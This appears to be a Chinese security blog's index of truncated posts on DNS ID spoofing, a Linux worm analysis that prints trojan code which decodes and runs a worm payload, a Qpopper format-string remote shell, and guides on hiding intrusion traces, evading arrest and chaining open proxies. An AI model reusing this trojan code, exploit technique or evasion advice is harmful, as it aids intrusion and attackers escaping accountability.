Posts for: #Security

DNS ID Hacking

(quack_at_xfocus.org)

DNS ID Hacking                    

by quack[email protected]

http://www.xfocus.org  安全焦点

参考资料:DNS ID Hacking by ADM crew

一、关于DNS ID Hacking的一些描述

你可能会对DNS ID Hacking\spoofing的含义有些迷惑,它与一般直接攻击一样,只

不过利用的是DNS协议上的漏洞,并且可能有较大的普遍性及伤害作用――好象没什

么DNS服务器能够逃过它――甚至WINNT。

1、DNS协议机制简述

首先我们来看看DNS是如何工作的,我将在这里说明这一协议中相对重要的一些部份。

为了更好的叙述,我们先用一个实例来看一看一个DNS请求的信息包是如何在网络里

传送的吧。

1.1 : 客户机(bla.bibi.com)发送一个请求要求解析域名"www.heike.com",bla.bibi.com

的DNS是ns.bibi.com这台机器,现在我们看看下图吧:

/———————————\

| 111.1.2.123  =  bla.bibi.com    |

| 111.1.2.222  =  ns.bibi.com     |

| 格式:                           |

| IP_ADDR:PORT->IP_ADDR:PORT      |

| 示例:                           |

| 111.1.2.123:2999->111.1.2.222:53|

-——————————–/

这图是我们要分析的情况的示意,应该很清楚了,好,那就看看gethostbyname是如何

工作的:

….

  gethosbyname("www.heike.com");

….

[bla.bibi.com]                             [ns.bibi.com]

111.1.2.123:1999 —>?[www.heike.com]——> 111.1.2.222:53

这里我们可以看到这个名字请求从bla.bibi.com的1999端口(随机选择)发送到了dns

机器的53端口――DNS的绑定端口。

dns.bibi.com收到这个解析的请求后,就开始了它的工作了……

[ns.bibi.com]                         [ns.internic.net]

111.1.2.222:53 ——–>dns?[www.heike.com]—-> 198.41.0.4:53

它先问ns.internic.net哪台机器是www.heike.com的主名称服务器,如果没查到的话

它就把请求发往.com域的权威服务器。在这里要先问ns.internic.net的原因是,可

能这个域名在它的缓存里存在着――这可以节约时间。

[ns.internic.net]                                      [ns.bibi.com]

[阅读全文]

分析一个linux下的蠕虫

quack (quack_at_xfocus.org)

分析一个linux下的蠕虫

Max Vision [email protected]

译:quack [email protected]

http://focus.silversand.net  安全焦点

一、简介

千年蠕虫(The Millennium Internet Worm)――后面简称worm,是一段script及程

序组成的,它执行的功能是利用linux系统的某些远程漏洞,获取该系统的进入权限,并且

将自身复制到其上并继续繁殖。现在发现的worm是针对x86的linux中imap4v10.X,

Qualcomm popper, bind , rpc.mountd 这些存在明显漏洞的服务进攻的。但它也做

了一件好事――修补了安全漏洞……

二、技术分析

我们最早发现的蠕虫据称是在ADMmountd2的远程漏洞利用程序中的(这个程序是对linux的

rpc.mountd服务进行攻击并可获取最高权限――这里不详述),但ADM组织否认曾经发布过带

有该特洛伊程序的代码,并将其归类于假冒ADM作品,可以参见

ftp://adm.freelsd.net/ADM/FAKES/ maintained by [email protected]].

这个木马是放在ADMmountd的所谓更新版本中,并在措词中表明这一版本的利用程序更为实用,

但其实隐蔽的代码就躲在ADMgetip.c中,ADM在其站点限制了对这一工具的下载,所以这里我

把它提供给大家,仅仅是用于教育目的――这一木马于1999-8-15被发现。

你可以在http://focus.silversand.net/newsite/tool/adm_fake.c下载ADMgetip-TROJAN-VERSION.c。

1、原型

该代码段中有一段mworm.tgz的uuencode代码,当运行该程序时,它会被展开于目录

/var/tmp/tmp,并且执行一个名为wormup的程序,代码段如下:

//Trojan Code from ADMgetip.c  

FILE *fp=fopen("/var/tmp/tmp",“w”); //打开文件

if(getuid()!=0) { fprintf(stderr,“operation not permitted\n”); exit(0); }

//检查uid是否为root

fprintf(fp,“begin-base64 644 mworm.tgz

H4sIANpU/TYAA+xaD3CUx3XfOx1wHALEHxts4/hDRrYE0vHdSQJkgQsIYWhk

UCSQHSM4n+6+4ztxujvfHypiuwEr1DqEYsWeTp1MUhOctEnr6biMnSbFY8vA

YNyBlGB3ShonZVy3ORmSIZgabMtcf293v7vvOwk7k4k7k5l8o3f7vd23b9++

…  [ large uuencoded mworm.tgz here ]

emgL0uE1iuMHR6u1MaA8jUhjOHm2+OzzGLqoNLv0SRpBuNS6XmDYdwe6Z55f

bYCEt3q80+XpdMU1NM8J2FDCra2crXTRduAMD0Johcwe8ODFVzDnnwNKJcF8

ivJ+7s3IgAEDBgwYMGDAgAEDBgwYMGDAgAEDPxS+AlHjZQIA+AIA

====\n”); //这是一段很长的uuecoded过的代码

system("( cd /var/tmp;uudecode < tmp ; sleep 1; tar xzvf mworm.tgz;\

[阅读全文]

如何隐藏你的踪迹

(quack_at_xfocus.org)

################################################

               #                                              #

               #               如何隐藏你的踪迹               #

               #                                              #

               ################################################

                       第一章   理论篇

                              I. 概述

                             II. 思想认识(MENTAL)

                            III. 基础知识

                             IV. 高级技巧

                              V. 当你受到怀疑时…

                             VI. 被捕

                            VII. 有用的程序

                           VIII. 最后的话

     I. 概述

     ———————————————————————-

  译者注:本文是德国著名hacker组织"The Hacker’s Choice"的96年写的一篇文章,

  但今天读来仍颇有收获,就象他自己说的:“即使是一个很有经验的hacker也能从这

  里学到一些东西”.在翻译的过程中对原文做了一些改动,也加入了一些自己的理解,

  不当之处,还请赐教.

                                              

     注意 : 本文分为两部分.

            第一部分讲述了一些背景和理论知识.

            第二部分通过具体的实例教你一步一步了解该做什么和不该做什么.

            如果你懒得看完全部文章,那就只读第二部分吧.它主要是写给那些

            Unix hack新手看的.

            

     如果你把尽快得到最新的exploits当成最重要的事的话,那我要说-你错了.

   译者注:exploits可以理解为"漏洞",不过我并不想这么翻,翻过来总感觉怪

   怪的,所以我还是保留了原文.文中还有一些地方也是如此处理,不再一一注明

     一旦警察没收了你的计算机、你的所有帐户都被取消、你的一切活动都被监视

     的时候,即便是最好的exploit对你又有什么用呢?

     我不想听那些辩解的话.

                不,最重要的事应该是不要被捕!

     这是每个hacker都应该明白的第一件事.因为在很多情况下,特别是当你首次

     hack一个由于饱受入侵之苦而开始对系统安全敏感的站点时,你的第一次hack

     也许就将成为你最后一次hack.

    

     所以请仔细阅读所有章节!

     即使是一个很有经验的hacker也能从中学到一些东西.

    

     下面是各节的简介:

             节 I   - 你现在正在读的

             节 II  - 思想认识

[阅读全文]

windows下的sock代理

quack (quack_at_xfocus.org)

windows下的sock代理

译:quack

参考资料:《ANONYMOUS CONNECTIONS OVER THE NET:Socks Chains in Windows》by zoa_chien

一、概要

这份文档讲述如何在ms windows下通过socks chain接入internet,使你能够匿名

地接入网络,别人想定位你也更不容易了。

二、原理

你传输数据时用了越多跳板,要找出你的真实踪迹就越困难,就如下面:

     you –> socks1 –> socks2 –> socks3 –> … –> socksx –> target

想要找出你,就必须连接x个你所通过的机器,并且找出他们的log,如果碰巧有一

个没有记录,线就断了:),即使都记录了,log里面登记的IP也是上一级跳板主机

的IP……

这种技巧可以用于:

. ICQ或者相似工具

. ftp客户端

. mail客户端

. telnet客户端

. 端口扫描器

. (以及几乎所有在网络中所使用的工具)

这可能不适用于某些IRC服务器,因为它们常常查看打开着的wingates及proxies。

三、开始吧

1、找到一些运行wingate的主机

     因为wingates的默认安装打开端口1080并且不记录socks连接。

     你可以从

     http://proxys4all.cgi.net/win-tel-socks.shtml或者

     http://www.cyberarmy.com/lists/wingate/找到一些公布出来的wingate的IP,或者

     你可以自己找到它们,你可以用’代理猎手’(?我不知道是不是国内流行的那个,似乎

     不太象,懒得去看了),可以从http://www.securax.org/ZC/anon/proxyht300beta5.exe

     下载。

     或者你可以用一个叫wingatescan的工具,下载连接在:          http://www.securax.org/ZC/anon/wgatescan-22.zip

     速度是非常重要的――因为我们要使用的多socks连接,所以klever dipstick可以帮

     助你断定哪个wingate是速度最快的,你可以从下面的连接下载:     http://klever.net/kin/static/dipstick.exe

     (其实这个工具应该就是ping每台主机,看它的反应速度罢了,找出回应最快的)

2、确认列表中的主机的确运行着wingate

     同样有很多工具能做这种事,比如server 2000,可以从          http://freespace.virgin.net/david.wood6/Server/Server.htm下载。

3、安装一个能截取发送的信息包的软件

     我使用的是一个叫purpose的工具,你可以从

     http://www.socks.nec.com/sockscap.html得到它。

     要设置它,只要在socks server填上: 127.0.0.1  port  8000.

[阅读全文]

通过Qpopper2.53远程获得shell

(quack_at_xfocus.org)

通过Qpopper2.53远程获得shell

by quack

参考:bufferoverflow secrurity advisory #5 by prizm

      

  • 简述

    Qpopper是使用相当广泛的POP3服务器,允许用户通过POP3客户端读他们的信件。

    它通常用于标准的UNIX系统里的邮件服务。

    

  • 问题

    在Qpopper2.53的版本中,QPOP的漏洞会使你远程获得一个gid=mail的shell。

    问题出在pop_msg()函数,当用户执行euidl命令时会出错,让我们检查一下Qpop

    2.53的代码吧:

    

    –> pop_uidl.c,在代码第150行处:

     …………….

            sprintf(buffer, “%d %s”, msg_id, mp->uidl_str);

            if (nl = index(buffer, NEWLINE)) *nl = 0;

            sprintf(buffer, “%s %d %.128s”, buffer, mp->length, from_hdr(p, mp));

     !      return (pop_msg (p,POP_SUCCESS, buffer));

                                      ^^^^^^^^^^^^^

     ……………..

    在pop_msg.c中函数pop_msg()定义为:pop_msg(POP *p, int stat,

    const char *format,…), 这里有一个用户输入的format:)

        好了,我们想象一下下面的情况吧:

         MAIL FROM:[email protected]

         200 Ok

         RCPT TO:[email protected]

         200 Ok

         data

         200 Okey, okey. end with “.”

[阅读全文]